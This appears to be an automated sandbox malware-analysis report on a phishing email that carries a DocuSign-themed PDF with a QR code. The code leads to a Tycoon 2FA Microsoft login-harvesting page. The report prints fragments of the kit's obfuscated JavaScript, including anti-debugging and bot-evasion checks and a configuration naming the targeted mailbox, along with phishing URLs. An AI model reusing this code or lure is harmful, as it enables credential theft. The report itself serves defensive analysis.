Edit tour

Windows Analysis Report
suspectTelling clean needful (78.2 KB).msg

Overview

General Information

Sample name:suspectTelling clean needful (78.2 KB).msg
Analysis ID:1648038
MD5:2b0ac19b806490627e0f204ab1c13b4c
SHA1:acb1dcafaaa37c7747da8d9d7ea56ffa59ef6cc1
SHA256:b0b175e8c17ac40bf72ebc62d7a079cc123f9c57a305d7d47bda8393ab287389
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
Suspicious PDF detected (based on various text indicators)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores large binary data to the registry
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6724 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\suspectTelling clean needful (78.2 KB).msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6740 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "5D9480B7-87DB-494E-8158-DCEF20A42F2E" "5A3E5134-C139-472A-844E-4DB1D81FEFFD" "6724" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • Acrobat.exe (PID: 2236 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\VHZABR72\Hillsboroughcounty_Settlement_Review_Signature_Required.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 6336 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 5252 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2132 --field-trial-handle=1576,i,2438255174600279274,1045567102742367200,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 3832 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://birdeye.cx/ionvrg#Upinedao@hillsboroughcounty.org MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 4172 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,8765833600481130617,6448814853754352925,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2016 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_254JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
    SourceRuleDescriptionAuthorStrings
    0.1.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
      0.1.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
        0.0.d.script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          0.0.d.script.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            0.4..script.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
              Click to see the 18 entries
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
              Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\VHZABR72\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6724, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'oazh.jyqhucdd.es' does not match the legitimate domain for Microsoft., The URL contains unusual elements and does not resemble any known Microsoft subdomains or services., The domain extension '.es' is not typically associated with Microsoft's main services., The presence of a password input field on a non-legitimate domain is suspicious. DOM: 1.4.pages.csv
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'oazh.jyqhucdd.es' does not match the legitimate domain for Microsoft., The URL uses a '.es' domain extension which is not typically associated with Microsoft., The URL contains random characters and does not resemble any known Microsoft subdomain or service., The presence of a well-known brand name like Microsoft in a non-matching domain is a common phishing tactic. DOM: 1.3.pages.csv
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.4..script.csv, type: HTML
              Source: Yara matchFile source: 0.0.pages.csv, type: HTML
              Source: Yara matchFile source: 1.19..script.csv, type: HTML
              Source: Yara matchFile source: 0.1.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_254, type: DROPPED
              Source: Yara matchFile source: 1.16.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
              Source: Yara matchFile source: 0.5.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.11..script.csv, type: HTML
              Source: Yara matchFile source: 0.8.d.script.csv, type: HTML
              Source: Yara matchFile source: 1.12..script.csv, type: HTML
              Source: Yara matchFile source: 1.3.pages.csv, type: HTML
              Source: Yara matchFile source: 1.4.pages.csv, type: HTML
              Source: PDF documentJoe Sandbox AI: PDF document contains QR code
              Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oazh.jyqhucdd.es/Yx6Is/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to execute malicious code and send sensitive user data to an untrusted domain, which is a clear indication of malicious intent. The overall behavior of this script is highly suspicious and poses a significant security risk.
              Source: 0.4..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oazh.jyqhucdd.es/Yx6Is/... This script demonstrates high-risk behaviors, including dynamic code execution through the use of a Proxy object that evaluates decoded strings. The obfuscated nature of the code and the potential for remote code execution make this a high-risk script.
              Source: 0.7..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oazh.jyqhucdd.es/Yx6Is/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code, the presence of a debugger, and the attempt to override the context menu and keyboard events further increase the risk. Overall, this script exhibits a high level of malicious intent and should be considered a significant security threat.
              Source: 1.12..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennp... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It attempts to detect the presence of web automation tools, redirects to a suspicious domain, and includes a function that performs XOR-based decryption of encoded strings. These behaviors are highly indicative of malicious intent, warranting a high-risk score.
              Source: 1.15..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennp... This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()` and potential data exfiltration to unknown domains. The use of obfuscated code and multiple fallback domains further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
              Source: 1.11..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennp... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, redirects to a blank page, and intercepts various keyboard and clipboard events to prevent user interaction. Additionally, it includes an interval function that triggers a debugger and redirects the user to an external website. These behaviors are highly suspicious and indicate a potentially malicious intent, warranting a high-risk score.
              Source: EmailJoe Sandbox AI: Detected potential phishing email: Generic and vague subject line 'Telling clean needful' is suspicious and unnatural. Attachment name suggests urgency and required action ('Settlement_Review_Signature_Required') - common phishing tactic. Sender domain 'lunafilmspr.com' appears unrelated to county government business
              Source: EmailJoe Sandbox AI: Detected suspicious elements in Email header: Suspicious localhost IP [127.0.0.1] in received header combined with external IP. Content-type is application/pdf which is unusual for direct email content. Base64 encoding combined with PDF content type suggests possible malicious attachment. IP address 193.235.147.162 appears in received headers but tries to mask with localhost. Combination of PDF content, encoding, and suspicious routing indicates potential malware delivery attempt
              Source: Adobe Acrobat PDFOCR Text: Hi I Is g h You have received a document to review and sign today Please use your smartphone camera to scan the Qr code below for quick access to your document for review All Parties completed. Please Docusign - Corrected Disbursment & Settlement Agreement (FINAL) Do Not Share This Email This email contains a secure link to Docusign. Please do not share this email link, or access code with others About Docusign Sign documents electronically in just minutes. it's safe, secure, and legally binding. Whether you're in an office, at home, on-the-go - or even across the globe - DocuSign provides a professional trusted solution for Digital Transaction Management E Microsoft
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: Number of links: 0
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: <input type="password" .../> found but no <form action="...
              Source: https://oazh.jyqhucdd.es/Yx6Is/#Upinedao@hillsboroughcounty.orgHTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function cExrhewVBl(event) { co...
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: Title: Complete Secure Account Login does not match URL
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: Invalid link: Terms of use
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: Invalid link: Privacy & cookies
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: Invalid link: Terms of use
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: Invalid link: Privacy & cookies
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "yx6is";var emailcheck = "pinedao@hillsboroughcounty.org";var webname = "rtrim(/web8/, '/')";var urlo = "/gkc3xoljzcm8jmvfybjnz76ol6ayzi7lfaeynsldqdckczwheihcq";var gdf = "/gh804phk6ci6llhwuhg27auv5xrdc1x9m3ab120";var odf = "/ijtmzhmbbycbpwwhr5khmaqoxsglbouvawcfoa4gmhzycd650";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(us...
              Source: https://oazh.jyqhucdd.es/Yx6Is/HTTP Parser: function cfirbracma(){atnsrxentp = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+vgvjacbtb2x1dglvbnmglsbjbm5vdmf0aw5nihrozsbgdxr1cmu8l3rpdgxlpgogidxzdhlszt4kicagigjvzhkgewogicagicbmb250lwzhbwlsetogqxjpywwsihnhbnmtc2vyawy7ciagicagigxpbmutagvpz2h0oiaxljy7ciagicagig1hcmdpbjogmdskicagicagcgfkzgluzzogmdskicagicagymfja2dyb3vuzc1jb2xvcjogi2y0zjrmndskicagicagy29sb3i6icmzmzm7ciagicb9ciagicbozwfkzxigewogicagicbiywnrz3jvdw5koiajmda1ytllowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzogmjbwecawowogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogmi41cmvtowogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogizmzmzskicagicagy29sb3i6icnmzmy7ciagicagihbhzgrpbmc6idewchg7ciagicagihrlehqtywxpz246ignlbnrlcjskicagih0kicagig5hdibhihskicagicagy29sb3i6icnmzmy7ciagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagicagbwfyz2luoiawide1chg7c...
              Source: EmailClassification: Task Manipulation
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: <input type="password" .../> found
              Source: https://oazh.jyqhucdd.es/Yx6Is/#Upinedao@hillsboroughcounty.orgHTTP Parser: No favicon
              Source: https://oazh.jyqhucdd.es/Yx6Is/#Upinedao@hillsboroughcounty.orgHTTP Parser: No favicon
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: No favicon
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: No favicon
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: No <meta name="author".. found
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: No <meta name="author".. found
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: No <meta name="copyright".. found
              Source: https://oazh.jyqhucdd.es/DLMYXGNJQADFKZOVFDWLXennpqpglxopbigyeazeW9YBUY67MZXZZHUR?JWINBCUJVEXMMTUYLPNYNYWUUHTTP Parser: No <meta name="copyright".. found
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownHTTPS traffic detected: 52.72.49.79:443 -> 192.168.2.17:49834 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.72.49.79:443 -> 192.168.2.17:49835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.72.49.79:443 -> 192.168.2.17:49838 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.65.73:443 -> 192.168.2.17:49848 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.17:49865 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49892 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.164:443 -> 192.168.2.17:49899 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.38:443 -> 192.168.2.17:49912 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.38:443 -> 192.168.2.17:49914 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.248:443 -> 192.168.2.17:49974 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.149.248:443 -> 192.168.2.17:49990 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.189.39:443 -> 192.168.2.17:50000 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:50003 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.114.4:443 -> 192.168.2.17:50015 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.17:50017 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.17:50016 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.17:50018 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.17:50019 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.17:50020 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.17:50041 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.17:50048 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.28:443 -> 192.168.2.17:50049 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.28:443 -> 192.168.2.17:50052 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 37MB
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.38
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
